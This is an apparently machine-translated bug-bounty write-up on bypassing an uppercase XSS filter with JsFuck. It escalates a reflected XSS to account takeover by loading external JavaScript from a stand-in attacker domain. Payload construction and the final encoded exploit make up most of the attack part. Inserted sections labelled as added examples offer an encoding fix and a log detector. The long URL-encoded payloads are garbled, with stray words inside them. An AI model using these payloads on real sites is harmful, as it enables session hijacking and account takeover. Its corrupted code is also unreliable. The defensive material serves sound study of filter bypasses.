2025-02-24 Update From: SLTechnology News&Howtos > Network Security
Shulou(Shulou.com)05/31 Report--
This article shows how to bypass XSS filters like a pro. It is concise and easy to follow, and I hope you can learn something from the details.
A code injection vulnerability inside JavaScript code is a real headache. Because this project was not a penetration test for an enterprise client, we can publish the technical details directly.
In short, we found a security vulnerability on a website and, after a period of code analysis, located an endpoint with an XSS vulnerability:
http://website.com/dir/subdir
The JavaScript code for this endpoint contains the following call:
Function("/DIR/SUBDIR", params)
After scanning with Burp Suite, we found that appending "-alert(1)-" to the end of the URL (http://website.com/dir/subdir/"-alert(1)-") gives a reflected XSS: the browser reports that the function ALERT (1) cannot be found, so the reflected value reaches the script in uppercase:
So next we need to find out which characters the server filters, such as the double quote, "/", "\" or ".".
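The reflection pattern above (a request path copied straight into a JavaScript string literal) next to the context-aware fix, as an added example that is not code from the original post or from the target site; renderScriptVulnerable, renderScriptSafe, jsStringLiteral, firstArgSeenByHandle and the stub handle() are illustrative names:

```javascript
// Added example (not from the original post). Names are illustrative.

// Vulnerable: the request path is concatenated into a JS string literal.
// A deny-list on characters such as ", / \ or . runs on the value, but the
// quote-plus-minus trick in the post shows why that is the wrong layer.
function renderScriptVulnerable(path) {
  return 'handle("' + path + '", params)';
}

// Fixed: JSON.stringify emits a valid JS string literal with every quote,
// backslash and control character escaped. The extra replacements cover what
// JSON leaves alone: "</script" and "<!--" must not be able to terminate the
// enclosing <script> block, and U+2028/U+2029 are line terminators in older
// engines.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderScriptSafe(path) {
  return 'handle(' + jsStringLiteral(path) + ', params)';
}

// Runs a generated snippet with a stub handle() and reports what the first
// argument evaluated to, so the two renderings can be compared directly.
function firstArgSeenByHandle(snippet) {
  let seen;
  const handle = (a) => { seen = a; };
  try {
    Function('handle', 'params', snippet)(handle, {});
  } catch (e) {
    // The vulnerable rendering ends up here: "..."-alert(1)-"" tries to call
    // alert(), exactly the "unable to find function" symptom in the post.
    return { ok: false, error: e.name };
  }
  return { ok: true, seen };
}
```

Two points follow from this. The safe rendering does not depend on any character deny-list, because the value is encoded for the exact context it lands in (a JS string inside a script block). And encoding must be the last step before output: a transformation applied afterwards, such as the uppercasing seen in this case, would turn a `\u003c` escape into the invalid `\U003C` and break the protection.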
Looking for an available Payload
We also found some solutions, all of them related to jsfuck.com.
Of course, we could already execute "alert (1)" on this site, but that is only a low-risk XSS, and we want to elevate it to a high-risk or critical vulnerability. To do that we need to load an external JS file and be able to perform arbitrary web actions without any user interaction.
The following figure shows a WordPress payload. Our goal is to load an external JS file in the target website and change the account password and e-mail address:
To build a JsFuck payload, the simple "alert (1)" is converted into the following JsFuck code:
"-% 5B%5D%5B (!% 5B%5D%2B%5B%5D)% 5B%2B%5B%5D%5D%2B (!% 5B%5D%2B%5B%5D)% 5B% 5B% 5D% 2B% 5B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B% 2B% 5B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B% 2B% 5B% 5D% 5D% 5D% 5D% 5D% 5D% 5D% 5D% 5D% 5D% 5D% 5D% 5D% 5D% 5D% 5D% 5D% 5D% 5B (% 5B%5D%2B%5B%5D%5B (!% 5B%5D%2B%5B%5D)% 5B%2B%5B%5D%5D%2B (!% 5B%5D%2B%5B%5D)% 5B% 5B% 5D% 2B% 5B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B% 2B% 5B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B% 2B% 5B% 5B% 5D%5D%5D)% 5B% 5B% 5D% 2B% 2B% 2B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D%5B (!% 5B%5D%2B%5B%5D)% 5B%2B%5B%5D%5D%2B (!% 5B%5D%2B%5B%5D)% 5B% 5B% 5D% 2B% 5B% 5D% 2B (!% 5B%5D%2B%5B%5D) % 5B% 2B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B%2B%5B%5D%5D%5D)% 5B% 2B% 5B% 5D% 2B% 2B% 5B% 5D% 5D% 2B (% 5B%5D%5B%5B%5D%5D%2B%5B%5D)% 5B% 2B% 5B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B% 5B% 5B % 5D% 2B% 5B% 5D% 2B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B%2B%5B%5D%5D%2B (!% 5B%5D%2B%5B%5D)% 5B% 2B% 5D% 5D% 2B (% 5B%5D%5B%5B%5D%5D%2B%5B%5D)% 5B%2B%5B%5D%5D%2B (% 5B% 5D% 2B% 5B% 5D%) 5B (!% 5B%5D%2B%5B%5D)% 5B%2B%5B%5D%5D%2B (!% 5B%5D%2B%5B%5D)% 5B% 5B% 5D% 2B% 2B% 5B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B% 2B% 5B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B%2B%5B%5D%5D%5D)% 5B% 5B% 5B% 5D% 2B / 5B%5D%2B%5B%5D% 5B% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B%2B%5B%5D%5D%2B (!% 5B%5D%2B%5B%5D%5B (!% 5B%5D%2B%5B%5D)% 5B%2B%5B%5D%5D%2B (!% 5B%5D%2B%5B%5D)% 5B% 5B% 5D% 2B% 5B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B% 2B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B%2B%5B%5D%5D%5D)% 5B% 2B% 5B% 5D% 2B% 5B% 2B% 5B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B% 2B% 2B% 5D% 5D ((!!% 5B%5D%2B%5B)% 5B% 5D% 5D) % 5D)% 5B% 2B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B% 5B% 5D% 2B% 5B% 5D% 2B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B%2B%5B%5D%5D%2B (% 5B%5D%5B%5B%5D%5D%2B%5B%5D)% 5B%2B%5B%5D%5D%2B (! 
% 5B%5D%2B%5B%5D)% 5B% 2B percent 5D% 5D% 2B (% 5B%5D%5B%5B%5D%5D%2B%5B%5D)% 5B% 2B% 2B% 2B% 5D% 5B% 5D% 2B (!% 5B%5D%2B%5B%5D%5B (!% 5B%5D%2B%5B%5D)% 5B%2B%5B%5D%5D%2B (!% 5B%5D%2B%5B%5D)% 5B% 5B% 5D% 2B% 5B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B% 2B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B%2B%5B%5D%5D%5D)% 5B% 5B% 5D% 2B% 5B% 5D% 2B% 2B% 5B% 5D% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B% 2B% 5B% 5D% 5B% 5D % 5D%2B (!% 5B%5D%2B%5B%5D)% 5B% 5D% 2B% 5B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B% 5D% 5D% 2B% 2B% 5D% 5D% 2B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B% 2B% 5B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B% 2B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D) )% 5B%2B%5B%5D%5D) () (% 2B% 5B% 5D)-"
If I wanted to implement "alert ([xss_clean])", the entire JsFuck code would be an estimated 13,000+ characters, and I found that once a request exceeds roughly 2500-2700 characters the target server returns "error 400".
Next, let's study how JsFuck works. Its source starts from a few values that can be written with only the characters []()!+ and then derives letters from the strings those values produce:

```javascript
const SIMPLE = {
  'false':     '![]',
  'true':      '!![]',
  'undefined': '[][[]]',
  'NaN':       '+[![]]',
  'Infinity':  '+(+!+[]+(!+[]+[])[!+[]+!+[]+!+[]]+[+!+[]]+[+[]]+[+[]]+[+[]])' // +"1e1000"
};

const CONSTRUCTORS = {
  'Array':    '[]',
  'Number':   '(+[])',
  'String':   '([]+[])',
  'Boolean':  '(![])',
  'Function': '[]["fill"]',
  'RegExp':   'Function("return/"+false+"/")()'
};

const MAPPING = {
  'a': '(false+"")[1]',
  'b': '([]["entries"]()+"")[2]',
  'c': '([]["fill"]+"")[3]',
  'd': '(undefined+"")[2]',
  'e': '(true+"")[3]',
  'f': '(false+"")[0]',
  'g': '(false+[0]+String)[20]',
  'h': '(+(101))["to"+String["name"]](21)[1]',
  'i': '([false]+undefined)[10]',
  'j': '([]["entries"]()+"")[3]',
  'k': '(+(20))["to"+String["name"]](21)',
  'l': '(false+"")[2]',
  'm': '(Number+"")[11]',
  'n': '(undefined+"")[1]',
  'o': '(true+[]["fill"])[10]',
  'p': '(+(211))["to"+String["name"]](31)[1]',
  // ... the table continues for the remaining letters
};
```

Then run part of this code in Chrome:
In general, we can assign these values directly to variables of different types, so that keyword strings such as false, true, undefined, NaN and Infinity are held in variables instead of being typed out in lowercase.
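To check the mapping table above rather than take it on faith, here is an added example (not code from the original post or from the JsFuck project) that evaluates each listed derivation in a JS engine. It also generalises the h/k/p/v/w/x/z entries: Number.prototype.toString(radix) prints any digit value from 10 to 35 as a lowercase letter, so every letter is the last digit of d.toString(d + 1) for its digit value d. The names MAPPING_SAMPLES, evalExpr, verifyMapping and radixRecipe are mine.

```javascript
// Added example (not from the original post or from JsFuck).

// Each entry: the expression as the table gives it, and the character it
// should yield. Several rely on V8's "function name() { [native code] }"
// string form and on "[object Array Iterator]".
const MAPPING_SAMPLES = {
  a: '(false+"")[1]',
  b: '([]["entries"]()+"")[2]',
  c: '([]["fill"]+"")[3]',
  d: '(undefined+"")[2]',
  e: '(true+"")[3]',
  f: '(false+"")[0]',
  g: '(false+[0]+String)[20]',
  h: '(+(101))["to"+String["name"]](21)[1]',
  i: '([false]+undefined)[10]',
  j: '([]["entries"]()+"")[3]',
  k: '(+(20))["to"+String["name"]](21)',
  l: '(false+"")[2]',
  m: '(Number+"")[11]',
  n: '(undefined+"")[1]',
  o: '(true+[]["fill"])[10]',
  y: '(NaN+[Infinity])[10]',
};

// Evaluate one expression in an isolated function scope and return its value.
function evalExpr(expr) {
  return Function('return (' + expr + ')')();
}

// Check every sample entry; returns the letters whose derivation does NOT
// produce the expected character (an empty list means the table checks out).
function verifyMapping(table = MAPPING_SAMPLES) {
  return Object.entries(table)
    .filter(([ch, expr]) => evalExpr(expr) !== ch)
    .map(([ch]) => ch);
}

// The rule behind the toString(radix) entries: digit value d (10..35) is
// printed as the letter 'a' + (d - 10), so letter == d.toString(d + 1).
// Returns the number, radix and resulting string for a lowercase ASCII letter.
function radixRecipe(letter) {
  const d = letter.charCodeAt(0) - 'a'.charCodeAt(0) + 10;   // a -> 10 ... z -> 35
  if (letter.length !== 1 || d < 10 || d > 35) {
    throw new Error('expected a single lowercase ASCII letter');
  }
  const radix = d + 1;
  const out = d.toString(radix);   // e.g. (20).toString(21) === 'k'
  return { n: d, radix, out };
}
```

The practical lesson for a filter author is visible in the table itself: every letter comes out of ordinary type coercion and built-in string forms, so no deny-list of characters or keywords can remove the ability to spell arbitrary identifiers; only encoding for the output context does.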
Next, I want to avoid lowercase characters entirely:

```javascript
Á = ![];        // false
É = !![];       // true
Í = [][[]];     // undefined
Ó = +[![]];     // NaN
SI = +(+!+[]+(!+[]+[])[!+[]+!+[]+!+[]]+[+!+[]]+[+[]]+[+[]]+[+[]]); // Infinity
ST = ([]+[]);   // "" (empty string)
Ü = (+[]);      // 0
A = (Á+"")[1];
D = (Í+"")[2];
E = (É+"")[3];
F = (Á+"")[0];
// G = <pure-JsFuck expression yielding "g", roughly 1200 characters; not reproduced here>
I = ([Á]+Í)[10];
L = (Á+"")[2];
T = (É+"")[0];
O = (É+[][F+I+L+L])[10];
R = (É+"")[1];
N = (Í+"")[1];
M = (+(208))[T+O+"S"+T+R+I+N+G](31)[1];
P = (+(211))[T+O+"S"+T+R+I+N+G](31)[1];
S = (Á+"")[3];
U = (Í+"")[0];
V = (+(31))[T+O+"S"+T+R+I+N+G](32);
X = (+(101))[T+O+"S"+T+R+I+N+G](34)[1];
Y = (Ó+[SI])[10];
Z = (+(35))[T+O+"S"+T+R+I+N+G](36);
C = ([][F+I+L+L]+"")[3];
H = (+(101))[T+O+"S"+T+R+I+N+G](21)[1];
K = (+(20))[T+O+"S"+T+R+I+N+G](21);
W = (+(32))[T+O+"S"+T+R+I+N+G](33);
J = ([][E+N+T+R+I+E+S]()+"")[3];
B = ([][E+N+T+R+I+E+S]()+"")[2];
```
Of course, I also need "." and "/". For ".", I can use the floating-point value 1.1e+101: converted to a string it reads "1.1e+101", which contains the "." (the final payload builds it as (+("11E100")+[])[1]):
Very good, I already have what we want; only "/" and "g" are still missing. Because of the uppercase filter, I intend to generate those with JsFuck, which costs about 1200 characters, but this payload is only 500 to 800 characters, still some way below the final limit.
Now that we have all the characters we need, it's time to execute our payload:

```javascript
[][F+I+L+L][C+O+N+S+T+R+U+C+T+O+R](A+L+E+R+T+"(1)")()
```

This code translates to `[]["fill"]["constructor"]("alert(1)")()`, and our JavaScript now runs even though it is written entirely in uppercase letters, which is very good!
I am counting on the target site using jQuery and loading it at the end of the page's HTML, so after the injection completes we wait three seconds for all dependencies to load and then call $.getScript to load our external JS file:

```javascript
// DOT holds "." and SLA holds "/" (built as described above)
[][F+I+L+L][C+O+N+S+T+R+U+C+T+O+R](S+E+T+"T"+I+M+E+O+U+T+"("+F+U+N+C+T+I+O+N+"(){ $"+DOT+G+E+T+"S"+C+R+I+P+T+"('"+SLA+SLA+"test"+SLA+"test'); }, 3000);")()
```

Three seconds later we successfully received the test/test request! Next, URL-encode the payload; the final payload is as follows:
% 3B% C3% 81customers! []% 3B% C3% 8D = [] []]% 3B%C3%93=%2B [! []]% 3BSI=%2B (% 2B% 2B []% 2B []% 2B []) [!% 2B []% 2B []) [!% 2B []% 2B []% 2B []% 2B []% 2B []% 2B []% 2B []% 2B []% 2B [] % 2B [])% 3BST = ([]% 2B [])% 3B% C3% 9C = (% 2B [])% 3BA = (% C3%81%2B%22%22) [1]% 3BD%20=%20 (% C3%8D%2B%22%22) [2]% 3BE%20=%20 (% C3%89%2B%22%22) [3]% 3BF%20=%20 (% C3%81%2B%22%22) [0]% 3BG%20=%20 [! []% 2B [% 2B []]% 2B []% 2B [] [% 2B []] [[!]% 2B%7B%7D] [% 2B []] [% 2B []% 2B []% 2B []% 2B []]% 2B []% 2B%7B%7D] [% 2B []] [% 2Billing% 2B []]% 2B [[]]% 2B []] [% 2B []] [% 2B []]% 2B []% 2B [! []% 2B [] [% 2B []] [% 2B []% 2B []% 2B []% 2B []% 2B []% 2B []] [% 2B []] [% 2B []] [% 2B []] [% 2B []]% 2B []] [% 2B []] [% 2B []] [% 2B []] [% 2B []]% 2B []]% 2B []% 2B []% 2B []% 2B []% 2B []% 2B []% 2B []% 2B []% 2B []% 2B []% 2B []% 2B [] ] [% 2B []] [% 2B []% 2B []]% 2B [! []% 2B []] [% 2B []] [% 2B []] [% 2B []] [% 2B []]% 2B [] [% 2B []] [% 2B% 2B []]% 2B [! []% 2B []] [% 2B []] [% 2B []] [% 2B []% 2B []] [% 2B []% 2B []% 2B []% 2B [] 2B []% 2B [% 2B []]% 3BI%20=%20 ([% C3% 81]% 2B%C3%8D) [10]% 3BL%20=%20 (% C3%81%2B%22%22) [2]% 3BT%20=%20 (% C3%89%2B%22%22) [0]% 3BO%20=%20 (% C3% 89% 2B [] [F%2BI%2BL%2BL]) [10]% 3BR%20=%20 (% C3%89%2B%22) % 22) [1]% 3BN%20=%20 (% C3%8D%2B%22%22) [1]% 3BM%20=%20 (% 2B (208)) [T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG] (31) [1]% 3BP%20=%20 (% 2B (211)) [T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG] (31) [1]% 3BS%20=%20 (% C3% 81% 2B) % 22% 22) [3]% 3BU%20=%20 (% C3%8D%2B%22%22) [0]% 3BV%20=%20 (% 2B (31)) [T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG] (32)% 3BX%20=%20 (% 2B (31)) [T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG] (34) [1]% 3BY%20=%20 (% C3% 93% 2B [ SI]) [10]% 3BZ%20=%20 (% 2B (35)) [T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG] (36)% 3BC%20=%20 ([] [F%2BI%2BL%2BL]% 2B%22%22) [3]% 3BH%20=%20 (% 2B (101)) [T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG] (21) [1]% 3BK%20=%20 (% 2B) (20) [T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG] (21)% 3BW%20=%20 (% 2B (32)) 
[T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG] (33)% 3BJ%20=%20 ([] [E%2BN%2BT%2BR%2BI%2BE%2BS] ()% 2B%22%22) [3]% 3BB%20=%20 ([] [E%2BN%2BT%2BR%2BI]) % 2BE%2BS] ()% 2B%22%22) [2]% 3BDOT%20=%20 (% 2B (% 2211E100%22)% 2B []) [1]% 3BSLA = (! []% 2B [% 2B! []) [([! []% 2B [] []) [% 2B% 2B []% 2B []]% 2B [! []% 2B []) [% 2B []]% 2B []) [% 2B []% 2B []) [% 2B []]% 2B []) [% 2B []) 2Billing% 2B []]% 2B (! []% 2B []) [!% 2B []% 2B []]% 2B ([! []]% 2B [] []]% 2B [] []% 2B []]% 2B [% 2B []% 2B ([] [[]% 2B []) [% 2B []]) [% 2B []% 2B []]) [% 2B [] []]% 2B []% 2B []] ]% 2B (! []% 2B []) [!% 2B []% 2B []]% 2B (! []% 2B []) [% 2B []]% 2B [! []% 2B []% 2B []) [!% 2B []% 2Baring% 2B []% 2B []% 2B []% 2B []) [! []% 2B []% 2B []]% 2B []) [!% 2B []% 2B []% 2B []% 2B []% 2B! % 2B []]% 2B (! []% 2B []) [!% 2B []% 2B% 2B []% 2B% 2B []] () [% 2B% 2B []% 2B []% 3B [] [] [F%2BI%2BL%2BL] [C%2BO%2BN%2BS%2BT%2BR%2BU%2BC%2BT%2BO%2BR] (S% 2BE% 2BT% 2B% 22T% 22% 2BI% 2BM% 2be% 2BO% 2BU% 2BT% 2B% 22 (% 22%2BF%2BU%2BN%2BC%2BT%2BI%2BO%2BN%2B%22 ()% 7B%20 $% 22%2BDOT%2BG%2BE%2BT%2B%22S%22%2BC%2BR%2BI%2BP%2BT%2B%22 ('% 22% 2BSLA% 2BSLA% 2B% 22BADASSDOMAIN% 22% 2BDOT% 2B% 22com% 22% 2BSLA% 2B% 22BADASSURL') ()% 3B%20%7D 203000) 3B%22) () 3B (22
We successfully loaded the external JS file into the target site, and that external JS file can change the password of the target account!
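From the defender's side, the final payload has a recognisable shape: decoded, it is dominated by the characters []()!+, and the post notes that the server only rejected requests above roughly 2500-2700 characters, so the shorter uppercase variant slipped under a pure length limit. The following added example (not from the original post) scores request-log paths by that shape. The log lines are constructed, the thresholds are illustrative, and LOG_LINES, scorePath and flagRequests are my names.

```javascript
// Added example (not from the original post). Log lines below are constructed.
const LOG_LINES = [
  'GET /dir/subdir HTTP/1.1',
  'GET /dir/subdir/report.pdf HTTP/1.1',
  // decodes to /dir/subdir/"-+[![]]+[][[]]-"  (JsFuck's NaN and undefined)
  'GET /dir/subdir/%22-%2B%5B%21%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D-%22 HTTP/1.1',
  'GET /search?q=%5B%5D%5B%22fill%22%5D HTTP/1.1',
];

const JSFUCK_CHARS = new Set('[]()!+');

// Decode one path and measure how much of it is made of JsFuck's six
// characters. Both the overall ratio and the longest unbroken run are
// reported: an uppercase-variable variant mixes in identifiers and lowers the
// ratio, but its Infinity/NaN building blocks still form long runs.
function scorePath(rawPath, { minRun = 6, minRatio = 0.4 } = {}) {
  let decoded;
  try { decoded = decodeURIComponent(rawPath); } catch { decoded = rawPath; }
  const chars = [...decoded];
  const hits = chars.filter((c) => JSFUCK_CHARS.has(c)).length;
  const ratio = chars.length ? hits / chars.length : 0;
  let run = 0, longestRun = 0;
  for (const c of chars) {
    run = JSFUCK_CHARS.has(c) ? run + 1 : 0;
    if (run > longestRun) longestRun = run;
  }
  return {
    decoded,
    length: chars.length,
    ratio,
    longestRun,
    suspicious: longestRun >= minRun && ratio >= minRatio,
  };
}

// Parse "METHOD path HTTP/x" request lines and return the suspicious ones
// together with their scores.
function flagRequests(lines, options) {
  return lines
    .map((line) => {
      const m = /^(\S+)\s+(\S+)\s+HTTP\//.exec(line);
      return m ? { line, ...scorePath(m[2], options) } : null;
    })
    .filter((r) => r && r.suspicious);
}
```

This is a triage heuristic, not a filter: it is meant to surface requests for review in a WAF or SIEM, while the actual fix remains context-correct output encoding at the reflection point.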
Summary
This vulnerability allowed an attacker to take over an account, elevating a low-risk XSS to a high-risk vulnerability, and it earned a $1000 bounty.
The above is how to bypass XSS filters like a pro. Have you learned something? If you want to learn more or broaden your knowledge, you are welcome to follow the industry information channel.
© 2024 shulou.com SLNews company. All rights reserved.